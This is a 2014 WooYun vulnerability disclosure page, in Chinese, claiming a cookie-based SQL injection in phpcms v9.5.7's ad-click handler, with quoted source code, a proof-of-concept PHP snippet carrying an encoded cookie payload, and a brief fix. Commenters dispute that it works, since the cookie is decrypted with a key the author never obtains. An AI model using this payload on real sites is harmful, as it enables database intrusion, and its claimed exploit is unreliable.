当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-066350

漏洞标题:phpcms最新版本SQL注射漏洞(有限制)

相关厂商:phpcms

漏洞作者: 路人甲

提交时间:2014-06-27 12:09

修复时间:2014-09-22 12:10

公开时间:2014-09-22 12:10

漏洞类型:SQL注射漏洞

危害等级:低

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-06-27: 细节已通知厂商并且等待厂商处理中
2014-07-02: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放
2014-08-26: 细节向核心白帽子及相关领域专家公开
2014-09-05: 细节向普通白帽子公开
2014-09-15: 细节向实习白帽子公开
2014-09-22: 细节向公众公开

简要描述:

该漏洞出现在代码对未对COOKIE做严格过滤,造成SQL注射。

详细说明:

测试版本:phpcms_v9.5.7_UTF8
漏洞简述:该漏洞出现在代码对未对COOKIE做严格过滤,造成SQL注射。
漏洞文件:phpcms\modules\poster\index.php
测试链接:http://127.0.0.1/phpcms/index.php?m=poster&c=index&a=poster_click&id=1

/**
	 * 统计广告点击次数
	 * 
	 */
	public function poster_click() {
		$id = isset($_GET['id']) ? intval($_GET['id']) : 0;
		$r = $this->db->get_one(array('id'=>$id));  
		if (!is_array($r) && empty($r)) return false; //这里抓包可以很容易得到广告位ID
		$ip_area = pc_base::load_sys_class('ip_area');
		$ip = ip();
		$area = $ip_area->get($ip);
		$username = param::get_cookie('username') ? param::get_cookie('username') : '';
		//问题出在这里,直接从COOKIE中获取$_COOKIE['username'],下文分析其中存在的过滤
		if($id) {
			//确保$_GET['id'] 值大于 1 
			$siteid = isset($_GET['siteid']) ? intval($_GET['siteid']) : get_siteid();
			$this->s_db->insert(array('siteid'=>$siteid, 'pid'=>$id, 'username'=>$username, 'area'=>$area, 'ip'=>$ip, 'referer'=>safe_replace(HTTP_REFERER), 'clicktime'=>SYS_TIME, 'type'=> 1));
			//上面insert在this->s_db->insert()函数中未过滤$useranme,然而该函数也没有过滤,导致直接注入
		}
		$this->db->update(array('clicks'=>'+=1'), array('id'=>$id));
		$setting = string2array($r['setting']);
		if (count($setting)==1) {
			$url = $setting['1']['linkurl'];
		} else {
			$url = isset($_GET['url']) ? $_GET['url'] : $setting['1']['linkurl'];
		}
		header('Location: '.$url);
	}


phpcms\libs\classes\param.class.php 

/**
	 * 获取通过 set_cookie 设置的 cookie 变量 
	 * @param string $var 变量名
	 * @param string $default 默认值 
	 * @return mixed 成功则返回cookie 值,否则返回 false
	 */
	public static function get_cookie($var, $default = '') {
		$var = pc_base::load_config('system','cookie_pre').$var;
		$value = isset($_COOKIE[$var]) ? sys_auth($_COOKIE[$var], 'DECODE') : $default;
		
		//这里虽然过滤了一些数据,但是我们注入COOKIE的数据$var='username'这两个分支都不会执行
		//因此我们注入的数据是不受限制的
		if(in_array($var,array('_userid','siteid'))) {
			$value = intval($value);
		} elseif($var=='_usename') {
			$value = safe_replace($value);
		}
		return $value;
	}

漏洞证明:

通过以上分析,需要首先将SQL语句注入到COOKIE中,然后直接访问http://127.0.0.1/phpcms/index.php?m=poster&c=index&a=poster_click&id=1 (访问该链接前需要设置COOKIE才能注入成功)
即可完成注入。下面是注入显示版本号。

phpcms.png


下图是通过SQL命令显示的版本号:

phpcms2.png


测试代码:

<?php 
$_COOKIE['username']="7c46CQRVUVMDUlYIBgNTA1IIVlZSWFADWlUABQcEQVAITwlME0lJMHYuI3tiFAYQdmspeEQRQlFUVQFDFgFbRg1CThMdSQIMXQEHTB5SW19fS05HBVdVHAgZSAUfThxgJnojemBFFwZBEQ9XWBweGRlYRlMWVlwUUV4EWEQPVUcKWQhmRwYJBl4DSExXVltVQxkBRwtMQRRaSUJWHwAdH0QHXwsaVFdbHVBICQYFEBwXHkoSVQ0BBw8IUwEFUhMfRAdBEA9G";
header('location:http://192.168.2.106/phpcms/index.php?m=poster&c=index&a=poster_click&id=1');
?>

修复方案:

COOKIE也是注入中不可忽视的,还是可以再get_cookie函数中严格过滤。

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-09-22 12:10

厂商回复:

最新状态:

暂无

漏洞评价:

评论

  1. 2014-06-27 12:14 | 微尘 ( 普通白帽子 | Rank:218 漏洞数:74 )

    前排来也。。@phpcms 最近是要火的节奏吗?

  2. 2014-06-27 12:17 | pigzhu ( 路人 | Rank:4 漏洞数:4 | 网络共享!)

    这个必须关注 求细节。。

  3. 2014-07-07 17:33 | 狗狗侠 ( 普通白帽子 | Rank:497 漏洞数:55 | 我是狗狗侠)

    这个感觉是个假漏洞、 唉、 乌云审核这些个漏洞的人啊。。。

  4. 2014-07-24 09:46 | xsjswt ( 普通白帽子 | Rank:156 漏洞数:49 | 我思故我猥琐,我猥琐故我强大)

    @狗狗侠 我也觉得这个是假漏洞

  5. 2014-08-02 22:42 | ′ 雨。 ( 普通白帽子 | Rank:1231 漏洞数:190 | Only Code Never Lie To Me.)

    sys_auth 不是需要key么? key哪来的

  6. 2014-09-01 13:36 | pigzhu ( 路人 | Rank:4 漏洞数:4 | 网络共享!)

    没成功 空白。。

  7. 2014-09-01 13:52 | ′ 雨。 ( 普通白帽子 | Rank:1231 漏洞数:190 | Only Code Never Lie To Me.)

    $value = isset($_COOKIE[$var]) ? sys_auth($_COOKIE[$var], 'DECODE') : $default;...我想知道key你哪里来的。

  8. 2014-09-01 17:12 | 狗狗侠 ( 普通白帽子 | Rank:497 漏洞数:55 | 我是狗狗侠)

    @′ 雨。 这个叫诈洞